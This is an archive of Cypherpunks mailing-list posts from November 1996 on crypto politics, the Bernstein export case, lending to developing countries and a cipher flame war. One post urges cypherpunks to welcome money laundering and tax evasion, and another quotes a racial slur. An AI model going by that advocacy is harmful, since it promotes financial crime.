Message-ID: <Pine.HPP.3.91.961101115516.17408B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Nov 1996, Jim Choate wrote:

> Again they knew something was up, just not where.

You may well be right, but there are seemingly serious
historians who claim otherwise. Since you have studied 
the subject for 30 years I would be interested in your
comments on the book 'Infamy' by John Toland (1982).
I remember being very taken by his arguments when I
read it. He has extensively studied the protocols from
the post war hearings and military court proceedings
dealing with the subject (and they were plentiful)
interviewed many of the involved persons years after.

According to Toland:

The US president, selected members of his cabinette and a
few admirals and generals knew - from Magic and the 'winds'
execute, radio traffic analysis, diplomatic sources, double
agents - exactly when and where the Japaneese were going to
attack, but didn't warn Hawaii, fearing that too efficient
counter-measures by the Oahu military might make the attack
abort and so not convince the isolationists. The unexpected 
tactical capabilities of the Japaneese armada then made a
cover-up all the more important.


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 1 Nov 1996 09:33:25 -0800 (PST)
To: IPG Sales <ipgsales@netprivacy.com>
Subject: Re: Q.E.D. reply to petty MESSger
In-Reply-To: <Pine.BSI.3.95.961031003552.25366A-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.91.961101123059.22899B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Oct 1996, IPG Sales wrote:

> > Get a clue about crypto before claiming others don't know anything.  You 
> > post, I'll answer if I feel like it.  Don't want to waste your time?  
> > Learn some crypto first and ask questions later - don't make blanket 
> > statements that claim an unbreakable cypher or a one time pad when you 
> > don't know what either means.
> > 
> Your didactic nonsense is only exceeded by your ignorance of the
> cryptography subject matter and your arrogance. Your pompous fustigation
> is an indicant of your hyper-inflated fatuous ego.  Sorry but it is not
> even in the same universe as what you dream it to be. Like the fermented
> pear juice one, your information = P log_base_infinity P.
> 
> Like all quacks, you read up on the subject matter, and then hang out your
> shingle and pretend you understand the subject of cryptography. The
> algorithm is out there at:
> 
>            netprivacy.com/algo.html
> 
> Let's see what you can do with it. You are all mouth, and like the lunatic
> fringe of all groups like this, you will come back with the peculated
> response that you do not want to waste your time. That shows your
> intellectual pap, and your intellectual cowardice/dishonesty. Have you
> had brain bypass surgery? Something is loose up there, only you do not
> realize it! By the way, your e-mail address is all messed up - someway it
> says brainlink.com, it is self evident that the "ink" should be "ess."
> 
> With kindest personal regards,

You want me to crack your silly cypher?  Goading me with insults won't 
work.  Pay me to.  It'll cost you at least $8000 before I'll even bother 
with it.  and yes I have seen your page. It's supposedly "pseudo code" 
but looks suspiciously like Visual basic.  Learn a real language!

Give me the full cypher source code in C or C++ and a check for $8000 and 
I'll take a look at the holes.  If not, quit pissing on this list.  
Cypherpunks get paid for their work and time.  We don't crack cyphers for 
free.  I recall the last time you offered your company to whoever cracked 
your lame ass cypher - it was cracked, but how come your company still is 
owned by you?  

Nope, goading and insults won't work.  Pay me up front and THEN I'll 
crack your weak stream cypher.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 1 Nov 1996 12:36:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Moneychangers and Shylocks
Message-ID: <v03007800aea00d0732bc@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



There've been a couple of "you must be trolling us" responses to my point
about the First World spending money in the Third World not being
exploitation ("and we give them worthless trinkets like penicillin,
schools, and roads").

I happen to believe economic development is a positive good. Were I living
in a shantytown or favelo on the outskirts of some Third World town, I
would want at least the _chance_ of eventually having running water,
electricity, health care, and opportunity for me and my family, Arguing
that native peoples were better off before the arrival of Europeans is
fatuous nonsense--you can't go home again.

Further, many of the leftist critiques of "moneylending as exploitation"
are similar to past (and current) demonizations of moneychangers,
moneylenders, shylocks, and other assorted stereotypes.

I don't favor nationalistic lending and borrowing policies, which, for
example, involve some central government borrowing money, sending the
borrowed funds to personal Swiss bank accounts, and then sticking the
nominal taxpayers with the debt. Nothing I have said here endorses this.

But much lending is useful. It's the way factories get built, the way
things get done.

Much of the criticism of "moneylenders" is closely related, if you think
about it, to criticism of "money launderers." Cypherpunks should relish the
rise of new mechanisms for money laundering, moneylending, tax evasion, etc.

I took the "Wired" quote about Walter Wriston "sounding like a cypherpunk"
to represent this new view, in explicit contrast to his earlier views when
he headed Citibank and they had a more statist approach.

Your mileage may vary, but tired homilies about lending being exploitation
are not very useful in this day and age.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hard Media <zaid@hardnet.co.uk>
Date: Fri, 1 Nov 1996 04:12:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about'
Message-ID: <v01520d01ae9fa0242dde@[158.152.61.59]>
MIME-Version: 1.0
Content-Type: text/plain


Message 1/40  From Timothy C. May
We mine the copper they have no money to mine and pay them with worthless
trinkets like penicillin, schools, and roads.

We are exploiting them.

Yep, they are better off in a state of natural grace, eating grubs and with
a life expectancy of 35.


--Tim May


I can't believe I'm hearing this. Buddy can you even READ? Have you
forgotten that the
Americas was doing fine until the Europeans got there and "civilised" it?
Go and read a few
books, try  "Bury My Heart at Wounded Knee" - J Dee  and then try
"Blackfoot Physics" by F David Peat.

Roads? Hell the longest tarred road in the world existed in India before
the Americas was colonised, I have a list of Chinese inventions made 10,000
years ago longer than your arm.

Oh yeah, the average life expentency for a male on the streets of LA is
about 35.

Then go and read some Chinese history, (Go and read Joseph Needman's
history of ancient China.)
 then try some Arab and Indian history. Maybe that'll give you some idea of
who was eating grubs when eh?

Anyways who the hell is talking "natural grace" if anything Europe during
the Dark Ages is a reflection of a "Western" heritage...and I can't
remember when I mentioned that living in a "natural" state was better than
being civilised, it's just that you seem to think that the "West" has a
monolpoly
on "civilisation". Which is pretty damn apathetic considering the access to
historic records and books you must surely have.

Honetly I'm just astonished that you insist on holding on to these ideas
before you'v had the
chance to check them out. What are your ideas based on anyways?CNN? I
suppose I should know better than to ask, the many times I'v been in the
States reminded me of Soviet Russia and the
"Iron Curtain", there seems to be a complete news blockout about the rest
of the world, enforced because intelligent people like you are content to
base your ideas and perceptions of the rest of the world on a mistaken
belief that the the universe revolves around the USA.

Just to clearify a this. You might not being doing this, but don't lump me
as being anti-Western.
I was born and live in London in the UK, and there are a huge number of
things that the West can be credited with achieving, but on the most part
the role of the West, mostly the USA, has been overblown.

In the UK and most of Europe there is a much greater understanding when it
comes to the rest of the world. Very few, if any, Englishmen today will
claim that our past colonial and imperial history is something to be proud
of. On the whole it isn't. The only place where these ideas florish are in
the USA.

Which is a shame.

Zaid Hassan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 1 Nov 1996 10:09:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: mbanx - 128 bit SSL transactions
Message-ID: <v03007801ae9fec9bbbc4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Can you say, "regulatory arbitrage"?

I knew you could...

Cheers,
Bob Hettinga

--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: "networks@vir.com" <networks@vir.com>
MIME-Version: 1.0
Precedence: Bulk
Date: Fri, 1 Nov 1996 11:02:33 -0500
From: "networks@vir.com" <networks@vir.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: mbanx - 128 bit SSL transactions

I just finished reading about mbanx www.mbanx.com

They're a new bank (owned by the Bank of Montreal)
which offers services including bill payment and
account transfers using the Internet.

One of the most interesting things about their service
is that they only permit transactions using Netscape
with 128 bit SSL.  When I heard that I immediately
assumed that I had to go out and buy it, but apparently
they will supply it to me for free if I don't already have
it (so they said when I talked to them on the phone
anyway).

Unfortunately, they seem to have a $13.00 a month fee,
so it's no wonder they aren't worried about giving you
128 bit Netscape.  It's a shame that despite the
fact that branchless banking is probably saving them
a lot of money on infrastructure, they still feel it's necessary
to charge a premium.  However, I must add that, in the
information I have, it is unclear whether the $13.00 fee
is standard or whether it is an option to replace transaction
charges.  I've got more information coming in the mail
so I'll try and keep everyone posted.

Alan Majer
networks@vir.com



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Nov 1996 10:27:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: sorry I'm late...
Message-ID: <199611011826.NAA02929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I'm about two weeks late getting the new cryptography mailing
list in place. Sameer Parekh volunteered his machines at C2, and as
soon as a couple of residual majordomo issues are resolved the list
will be announced and go on line.

I thank you all for your patience.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 1 Nov 1996 13:24:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <199611012123.NAA07411@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 AM 11/1/96 -0800, Timothy C. May wrote:

>Sliderules were just becoming common when I was in high school....
>
>Seriously, only a very few of us had and used sliderules...mine was a big
>synthetic K & E (Keuffel and Esser, as I recall). The raging "DOS vs. Mac"
>or "RISC vs. CISC" debate of that age was "aluminum" (the yellow Dietzgens)
>vs. the old standby, "bamboo." Plus some oddball circular sliderules.

Slide rules are still, IMHO, the best calculator to keep in a car for
calculating gas mileage.  They are rugged, have no batteries, are not
attractive to thieves, and have sufficient accuracy for the problem.  They
also teach the logarithm relation, which is valuable for understanding the
physical universe.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hard Media <zaid@hardnet.co.uk>
Date: Fri, 1 Nov 1996 04:40:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about'
Message-ID: <v01520d00ae9faaa2a4be@[158.152.61.59]>
MIME-Version: 1.0
Content-Type: text/plain



Oh Oh. I said bad things about Americans...in trouble now.

Anyways. Here are some figures:

"In the 20 year period between 1970 and 1989, the external debt of
developing nations grew from
$68.4 billion to $1 283 billion, an increase of 1846 per cent. Debt service
payments increased by 1400 per cent and were in excess of $160 billion by
the end of the 80s."

by the way most of this debt is concentrated in South American.


Zaid







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Fri, 1 Nov 1996 10:38:21 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Stanford Patents
Message-ID: <961101183509_72124.3234_IHO92-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone heard anything from the Schlafly vs PKP case?  There
were supposed to be patent validity hearings on Wednesday.  I
don't know if they are still going on, Roger hasn't updated his web
page yet.

Kent Briggs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Nov 1996 11:32:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: NSA Report on Anonymous E-Cash
Message-ID: <1.5.4.32.19961101193126.006bf3a4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've put the NSA report, "How To Make A Mint: The Cryptography
of Anonymous Electronic Cash, June, 1996" at:

     http://jya.com/nsamint.htm   (84 kb)

It argues the dangers of anonymous cash and how to combat it.

Thanks to the authors, Laurie Law, Susan Sabett and Jerry
Solinas, NSA; Thomas Vartanian, Fried, Frank; and anonymous 
others.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 1 Nov 1996 12:53:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007802ae9fed297e06@[207.167.93.63]>
Message-ID: <0mSaAA200YUd1PIBY0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Timothy C. May" <tcmay@got.net> writes:
> At 9:16 AM -0800 10/31/96, Hal Finney wrote:
<snip>
> Sliderules were just becoming common when I was in high school....
> 
> Seriously, only a very few of us had and used sliderules...mine was a big
> synthetic K & E (Keuffel and Esser, as I recall). The raging "DOS vs. Mac"
> or "RISC vs. CISC" debate of that age was "aluminum" (the yellow Dietzgens)
> vs. the old standby, "bamboo." Plus some oddball circular sliderules.
> 
> Those of us who used sliderules were sometimes characterized as
> "nerds"...perhaps this is why I today have such a strong reation to so many
> young programmers and engineers voluntarily calling themselves "nerds" and
> "geeks." (The deconstructive, postmodern theory is presumably that they are
> "reclaiming" the term, as with dykes and niggers reclaiming those hateful
> terms. I still reject this as crap.)

What's there to reject in "Yeah, I'm happy with what I want, so fuck
you?" (Which is essentially what this reclaming stuff is). Of course,
I see nothing wrong with rejecting postmodernist intellectuals :-) but
they have stolen some good ideas.

<comments re: tables snipped>
> (Precomputation of values, aka "tabling," is of course still a modern
> topic. Some of the newer names come out of AI, compiler research, etc. For
> example, speculative execution. Not exactly a book of precomputed logs, but
> similar.)

Let's not forget memoizing, either. Kinda space ineficient, but with a
decent virtual memory system you can cache perviously-used solutions
and go real fast. Hmmm, like, say you were for some reason trying to
factor a multitude of large composites. Precomputing everything would
probably be rather inefficient, but once you've factords something,
why throw it away? (I knew there would be some crypto relevance in
here :-)

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMnpjBckz/YzIV3P5AQEpWgMAl8PkPlrY/s84JGnuoiX7gPXMfjQlo+fZ
tBxJVg6FP9EVB5ASL2FDk3s8butKC6FP7SpJZOSzmUSExawzFpuHW1IZc5efxhBR
Cyzjj1ybUhEUGPHlBhrqbTXU5EzI5iB5
=m5oK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 1 Nov 1996 16:19:23 -0800 (PST)
To: Bruce Schneier <cypherpunks@toad.com
Subject: Re: New Bihman-Shamir Fault Analysis Paper
In-Reply-To: <v03007804ae9e6eb1b360@[204.246.66.47]>
Message-ID: <v03007800aea040ab78e7@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain


There is an inherent conflict between two claims that are
central to the fault-analysis paper(s):
   "the secret key [is] stored in a tamperproof cryptographic device"
and
   "the cryptographic key is stored in an asymmetric type of
    memory, in which induced faults ..."

If the device is truly tamperproof, the attacker should not
be able to induce faults.  Even given susceptable "consumer-
quality" devices, it would be trivial to store the cryptographic keys
in a redundant memory configuration, such as ECC "error-correcting
code" memory that can self-correct a range of failures and detect
a much wider range. It would also seem reasonable to protect the
cryptographic core (algorithms and data) with a digital signature
that would "crash" the device, rather than proceed with incorrect
key information.

My naive reading of the attack suggests that storing the cryptographic
key together with its one's complement would minimize the chance that
an attacker can exploit asymmetric fault inducement.

Finally, I'm curious whether this attack would work on masked ROM
or fusable-link (one-time programmable) PROMs (not EPROMs that have
no reprogramming window). These are more likely to be used in
production devices than EEPROMs, if only for cost-savings.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 1 Nov 1996 16:34:00 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <v02130501aea03d0a67fe@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Are there any current import restrictions for products on can legally
>manufacture, sell, and use in the United States?
>
>Thanks.

Yes, all products which may create RF radiation (e.g., personal computers)
are required to pass FCC certifications (e.g., Part 15).  Also, telephone
equipment (e.g., modems) must pass other Part 15 provisions before they may
be sold in the U.S. to interconnect with our public switched network.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear             | Internet: azur@netcom.com
Lamarr Labs              | Voice: 1-702-658-2654
7075 West Gowan Road     | Fax: 1-702-658-2673
Suite 2148               |
Las Vegas, NV 89129      |
---------------------------------------------------------------------

Internet and Wireless Development

Vote Liberatrian!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 1 Nov 1996 16:29:06 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <v02130502aea03e5cb753@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>> Are there any current import restrictions for products on can legally
>> manufacture, sell, and use in the United States?
>
>Sure. Firearms. The Gun Control Act of 1968 bans the importation of
...
[snip]
>
>What does all that have to do with crypto? It is the *same* issue. In the
>government's view, crypto is a danger to their future plans, just as
>firearms are. Do you think it is a coincidence that crypto is listed as a
>munition? Think about it for just a moment. Crypto is a weapon in the
>hands of the people. And that's what Cypherpunks is all about.
>
>Starting from import restrictions, you will see restrictions on size of
>keys (=maximum rounds in the magazine, now set at 10, proposed to be
>lowered to six), who may own it (no felons, people convicted of certain
>misdemeanors), who may sell it and how it can be purchased (must provide
>identification, sales will be logged). I guess you can figure out the rest.
>
>--Lucky

Yes, but crypto is one of the first intangible 'munitions'.  It is much
easier to constrain physical items than data.  That is why anonimity,
especially financial transaction anonymity, is so aboherant to LE.


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

                          Hacker Opportunities
                        (Let's Make Lots Of Money)

I've got the brains, you've got the tricks
Let's make lots of money
You've got the code, I've got the hooks
Let's make lots of ...

I've had enough of scheming and messing `round with jerks
My crypto code's compiled, I'm afraid it doesn't work
I'm looking for a partner, someone who gets things fixed
Ask yourself this question: do you want to be rich?

I've got the hacks, you've got the keys
Let's make lots of money
You've got the code, I've got the hooks
Let's make lots of money

You can tell I'm educated, I studied at CalTech
Doctored in mathematics, I could've been set
I can program a computer, choose the perfect time
If you've got the inclination, I have got the crime

Ooooh, there's a lot of opportunities
If you know when to take them, you know
There's a lot of opportunities
If there aren't, you can make them (Make or break them)

I've got the brains, you've got the tricks
Let's make lots of money
Let's make lots of ...

You can see I'm single-minded, I know what I could be
How do you feel about it? Come, take a walk with me
I'm looking for a partner regardless of expense
Think about it seriously, you know it makes sense

Let's (Got the brains)
Make (Got the tricks)
Let's make lots of money (Money)
Let's (You've got the code)
Make (I've got the hacks)
Let's make lots of money (Money)
I've got the brains (Got the hooks)
You've got the code (Got the keys)
Let's make lots of money (Money)
Money! 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 1 Nov 1996 14:13:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Moneychangers and Shylocks
In-Reply-To: <v03007800aea00d0732bc@[207.167.93.63]>
Message-ID: <0mSbKI200YUd1PI0w0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Timothy C. May" <tcmay@got.net> writes:
> There've been a couple of "you must be trolling us" responses to my point
> about the First World spending money in the Third World not being
> exploitation ("and we give them worthless trinkets like penicillin,
> schools, and roads").
> 
> I happen to believe economic development is a positive good. Were I living
> in a shantytown or favelo on the outskirts of some Third World town, I
> would want at least the _chance_ of eventually having running water,
> electricity, health care,

Not that you can really know... I have been to East Africa (Tanzania),
and have seen the conditions of both the rich, the poor, and the
rural. First off, it's at best difficult to compare happiness. I mean,
at the extreme you have the Taoist philosophy that happiness is
constant, which has more than a kernel of truth to it. If you're
living out in the sticks, you don't expect to live past 35, so what's
the biggie if you don't? However, I'm not quite that nihilist, and so
I try to make some judgements about who is happier than who.

To start off with, you say you want the chance of getting a "better"
life. Here there's some difficulty in defining a reasonable chance.
The chance of someone in a Dar Es Salaam shanty being able to move
into better accomodations in the city is zero. Really, truly, zero.
Those who are in power have no interest in letting somone take their
power away. The elite is closed. The best that a shanty resident can
do is hope to be able to support one more child. (This is not as
unimportant as it might seem to some westerners. It's a big thing to
have many {male} children in most of Africa.) So, it could be argued
that the presence of wealth just taunts the underclass in that sort of
situation.

My impression was that rural folks are the happier. They have a more
supportive society, less crime, and don't really have much of a
shorter lifespan thant the city folk.

> and opportunity for me and my family, Arguing
> that native peoples were better off before the arrival of Europeans is
> fatuous nonsense--you can't go home again.

Not true. "Society" has passed through Africa many times, the people
revert to their previous ways.

> Further, many of the leftist critiques of "moneylending as exploitation"
> are similar to past (and current) demonizations of moneychangers,
> moneylenders, shylocks, and other assorted stereotypes.
>
> I don't favor nationalistic lending and borrowing policies, which, for
> example, involve some central government borrowing money, sending the
> borrowed funds to personal Swiss bank accounts, and then sticking the
> nominal taxpayers with the debt. Nothing I have said here endorses this.

But that's the only way it hapens in the third world. The only time
foreign aid is not gutted by corrupt beaurocrats is when the
Westerners go there and manage the projects themselves. This is quite
different from a loan.
 
> But much lending is useful. It's the way factories get built, the way
> things get done.

Heh, have you ever *seen* a third world factory 10 years after it was
built. Nice bit of scap, that.

> Much of the criticism of "moneylenders" is closely related, if you think
> about it, to criticism of "money launderers." Cypherpunks should relish the
> rise of new mechanisms for money laundering, moneylending, tax evasion, etc.
> 
> I took the "Wired" quote about Walter Wriston "sounding like a cypherpunk"
> to represent this new view, in explicit contrast to his earlier views when
> he headed Citibank and they had a more statist approach.
> 
> Your mileage may vary, but tired homilies about lending being exploitation
> are not very useful in this day and age.

I dunno, pearls befre swine still applies. It's not that I think
lending is bad, but large economic development loans to thrild world
countries continue to support corruption and oppression, and not much
else. 

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMnp1j8kz/YzIV3P5AQGLYAMAwbYlr4FpEaKHdiCQ3Vkit5afi77LrB90
kFx0Q49ev6em7MvfLtZZBeg4r1f4EITbWV+ktGrzF4vEMW8r4TkMl05yb06JLL2j
JsEYLxbnCRJBfoZ8rzpC4me2JxZf66vH
=spX/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 1 Nov 1996 17:27:03 -0800 (PST)
To: cypherpunks, cypherpunks-announce, gnu
Subject: Bernstein hearing, Nov 8, 10:30AM: injunction against export controls
Message-ID: <199611020127.RAA01285@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Watch the noose tighten around the scrawny neck of the vile crypto
export controls!  Be part of reclaiming your freedom to teach
cryptography and to share your crypto expressions worldwide!  Garb
yourself in a ritual costume used by powerful and famous people!  See
the smooth Justice Department minion who lost the Communications
Decency Act case once again fail to suppress free speech!  Meet
renowned East Coast lawyer Robert Corn-Revere, who helped Phil
Zimmermann face down ITAR prosecution!

Next Friday, 8 November 1996, at 10:30AM we will join forces at Yet
Another Hearing in the case of Dan Bernstein v. Large Government
Agencies.  Convene at the Federal Building in San Francisco, 450
Golden Gate Avenue, in the courtroom of Judge Marilyn Hall Patel.
We'll recognize each other because we'll all be dressed like lawyers.

We will follow the formal proceedings with a group lunch at Max's
Opera Plaza, a block away at Van Ness Avenue and Golden Gate Avenue.
Or come prepared to suggest a walkable alternative eatery more to your
liking, and we can go there instead.

Dan would like to teach a class in cryptography in the upcoming winter
semester, but is afraid that teaching it in the ordinary way (posting
his class materials on the Web, etc) would violate the ITAR.  He
thinks that the ITAR is unconstitutional, and that altering his
ordinary teaching because of a threat of ITAR prosecution is a
"chilling effect" on his constitutional rights of free expression and
academic freedom.

Because it's not clear whether the earlier, broader, motions that we
argued in September will be decided by the time of his class, he has
asked the judge for a "preliminary injunction", a court order in the
following form:

	    2. Defendants are ENJOINED from investigating or
    prosecuting under the Arms Export Control Act (AECA) 22 U.S.C.
    2778 et seq., and the International Traffic in Arms Regulations
    (ITAR), 22 C.F.R. 120 et seq., or any export control statute or
    regulation which would require prepublication licensing of any
    teaching or scientific exchange activities, the following persons:
		    a. Plaintiff, and
		    b. Plaintiff's students, and
		    c. Any person who receives technical data,
    cryptography software or defense services from Plaintiff or his
    students; when such technical data, cryptography software or
    defense services were given or received as part of teaching or
    scientific exchanges during or in preparation for the cryptography
    course to be taught by Plaintiff during the Spring, 1997 semester
    at the University of Illinois at Chicago.
	    3. Defendants are further ENJOINED from requiring
    licensure, approval, registration, reporting or the fulfillment of
    any requirements of the AECA, ITAR or any export control statute
    or regulation which would require prepublication licensing of any
    teaching or scientific exchange activities, the [same] persons...

We tried to get the Government to agree to this without getting the
judge involved, but despite their protests that they don't control
academic activities, they would not agree.  So here we go with another
"Cypherpunks Dress-Up Day" on a Friday morning in San Francisco.

Robert Corn-Revere <rcr@dc1.hhlaw.com> has recently joined the
Bernstein legal team.  He wrote the excellent arguments for this
motion, and will attend the hearing.  Here's a sample of his prose.

	Despite repeated denials that the Government is restricting
    academic freedom, Defendants display a striking enthusiasm for
    defining the limits of "appropriate" academic inquiry and
    communication.  Without directly disputing the fact that computer
    software and source code *is* speech, or that access to such
    software is essential to Prof. Bernstein's course on cryptography,
    or that consultation with other researchers in the field
    (generally via the Internet) is part of the normal academic
    process, or that posting such materials for students on the World
    Wide Web is standard academic practice, Defendants baldly assert
    that such activities have "nothing to do with teaching a class in
    Chicago."  PI Opp at 1.  Indeed Defendants state categorically
    that "the principle of 'academic freedom' does not authorize
    Plaintiff to transmit abroad [cryptographic software], *even if
    his own purpose is merely to convey some theory implicit in the
    software*."  Id. at 22-23 (emphasis added).
...    
	...The Government's argument essentially collapses to the
    proposition that if it is not restricting speech in *all* cases,
    it is not engaging in censorship in *some* cases.  Yet in every
    case with which the Plaintiff is familiar in which cryptographers
    have consulted the Government (or otherwise been brought to the
    Government's attention), the officials who administer the ITAR
    scheme have counseled caution, have initiated investigations and
    have subjected publications to the CJ process.  In this respect,
    Defendants have instituted a kind of "don't ask/don't tell" policy
    for cryptography. ...  If anything, such an informal approach
    causes greater concern, since the law is clear that sporadic or
    discretionary enforcement of a policy that restricts speech
    creates a more significant First Amendment problem than does
    uniform enforcement.
...
	The Government's Opposition borders on the schizophrenic.
    Defendants repeatedly assert that teaching a class on cryptography
    or making software available to students are not "regulated by the
    Government", PI Opp at 1, yet just as repeatedly describe the
    conditions under which the very same activities are regulated by
    the ITAR.  The Government maintains that it "is not threatening to
    prosecute Plaintiff or anyone for teaching cryptography," Id. at
    2, yet continues to argue that the course plan Prof. Bernstein is
    proposing would violate the export controls.

As background, Dan Bernstein, ex-grad-student from UC Berkeley, is
suing the State Department, NSA, and other agencies, with help from
the EFF.  These agencies restrained Dan's ability to publish a paper,
as well as source code, for the crypto algorithm that he invented.  We
claim that their procedures, regulations, and laws are not only
unconstitutional as applied to Dan, but in general.  Full background
and details on the case, including all of our legal papers (and most
of the government's as well), are in the EFF Web archives at:
    http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case.
[Actually, not all the paperwork for this Preliminary Injunction is
online yet, but we hope it will be by the time you read this...]

Like Phil Karn's and Peter Junger's cases, this lawsuit really has the
potential to outlaw the whole NSA crypto export scam.  We intend to
make your right to publish and export crypto software as well-
protected by the courts as your right to publish and export books.  It
will probably take more years, and an eventual Supreme Court decision,
to make it stick.  But perhaps at this hearing we can make it legal
for one teacher to teach crypto using the Web this winter.

Please make a positive impression on the judge.  Show her -- by
showing up -- that this case matters to lots of people.  Most court
cases have nobody in the audience.  Demonstrate that her decision will
make a difference to society.  That the public and the press are
watching, and really do care that she handles the issue well.

We'll have to be quiet and orderly while we're in the courthouse.
There will be no questions from the audience (that's us), and no
photography, but the session will be tape-recorded and transcribed.
You can take notes if you like.

So, here's your excuse to put on a nice costume, take the morning off,
and pay a call on the inner sanctum of our civil rights.  See you there!

	John Gilmore

PS:  If you can't come, you can still contribute.  Become an EFF
member; see http://www.eff.org/join.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
